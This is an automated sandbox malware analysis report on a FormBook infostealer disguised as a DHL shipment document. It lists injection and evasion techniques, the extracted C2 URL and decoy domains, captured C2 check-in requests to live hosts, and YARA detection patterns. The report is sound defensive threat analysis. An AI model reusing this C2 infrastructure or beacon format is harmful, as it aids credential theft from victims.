Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Shipment doc.exe

Overview

General Information

Sample Name:DHL Shipment doc.exe
Analysis ID:568428
MD5:4f0d2852d2aad43eddf9416661933701
SHA1:abe4f65cc594a4c217a65486c3025832fe037161
SHA256:45469e46b7281b1f1c74cbd1953e47121a233462b7ab0db7b8346c5b7b3dfa1c
Tags:DHLexeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • DHL Shipment doc.exe (PID: 5032 cmdline: "C:\Users\user\Desktop\DHL Shipment doc.exe" MD5: 4F0D2852D2AAD43EDDF9416661933701)
    • DHL Shipment doc.exe (PID: 5820 cmdline: C:\Users\user\Desktop\DHL Shipment doc.exe MD5: 4F0D2852D2AAD43EDDF9416661933701)
    • DHL Shipment doc.exe (PID: 6640 cmdline: C:\Users\user\Desktop\DHL Shipment doc.exe MD5: 4F0D2852D2AAD43EDDF9416661933701)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autoconv.exe (PID: 7096 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • msiexec.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
        • cmd.exe (PID: 5620 cmdline: /c del "C:\Users\user\Desktop\DHL Shipment doc.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.DHL Shipment doc.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.DHL Shipment doc.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.DHL Shipment doc.exe.400000.6.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
        • 0x16b18:$sqlite3text: 68 38 2A 90 C5
        • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
        3.0.DHL Shipment doc.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.DHL Shipment doc.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 20 entries

          Sigma Signatures

          No Sigma rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}
          Multi AV Scanner detection for submitted file
          Source: DHL Shipment doc.exeReversingLabs: Detection: 34%
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.floridanratraining.com/how6/Avira URL Cloud: Label: malware
          Source: http://www.auctions.email/how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLddAvira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: DHL Shipment doc.exeJoe Sandbox ML: detected
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL Shipment doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: DHL Shipment doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: StaticArrayInitTypeSize40.pdbxD source: DHL Shipment doc.exe
          Source: Binary string: msiexec.pdb source: DHL Shipment doc.exe, 00000003.00000002.804927293.00000000033B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: StaticArrayInitTypeSize40.pdb source: DHL Shipment doc.exe
          Source: Binary string: msiexec.pdbGCTL source: DHL Shipment doc.exe, 00000003.00000002.804927293.00000000033B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000003.00000002.799983136.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000003.00000002.799983136.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: autoconv.pdb source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: autoconv.pdbGCTL source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 4x nop then pop edi3_2_0040C3AE
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 4x nop then pop edi3_2_00415681
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi11_2_00E9C3AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi11_2_00EA5681

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49825 -> 35.213.137.92:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49825 -> 35.213.137.92:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49825 -> 35.213.137.92:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49845 -> 37.140.192.43:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49845 -> 37.140.192.43:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49845 -> 37.140.192.43:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.bbgm4egda.xyz
          Source: C:\Windows\explorer.exeDomain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exeDomain query: www.auctions.email
          Source: C:\Windows\explorer.exeDomain query: www.klopert77.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.213.137.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.solatopotato.com
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.bbgm4egda.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.floridanratraining.com/how6/
          Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
          Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.auctions.emailConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.solatopotato.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 81.169.145.72 81.169.145.72
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Feb 2022 10:23:34 GMTServer: Apache/2.4.52 (Unix)X-Powered-By: PHP/7.4.27X-UA-Compatible: IE=edgeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://solpotato.com/wp-json/>; rel="https://api.w.org/"Content-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunkedData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 53 6f 6c 61 74 6f 20 50 6f 74 61 74 6f 20 26 23 38 32 31 31 3b 20 4c 65 67 65 6e 64 61 72 79 20 53 6f 6c 61 6e 61 20 50 6f 74 61 74 6f 65 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 6f 6c 70 6f 74 61 74 6f 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 53 6f 6c 61 74 6f 20 50 6f 74 61 74 6f 20 2d 20 4c 65 67 65 6e 64 61 72 79 20 53 6f 6c 61 6e 61 20 50 6f 74 61 74 6f 65 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 6f 6c 70 6f 74 61 74 6f 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 53 6f 6c 61 74 6f 20 50 6f 74 61 74 6f 20 2d 20 4c 65 67 65 6e 64 61 72 79 20 53 6f 6c 61 6e 61 20 50 6f 74 61 74 6f 65 73 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 6f 6c 70 6f 74 61 74 6f 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 64 63 61 73 74 20 46 65 65 64 3a 20 20 28 4d 50 33 20 46 65 65 64 29 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2
          Source: unknownDNS traffic detected: queries for: www.bbgm4egda.xyz
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.auctions.emailConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.solatopotato.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: DHL Shipment doc.exe, 00000000.00000002.692578717.0000000001570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
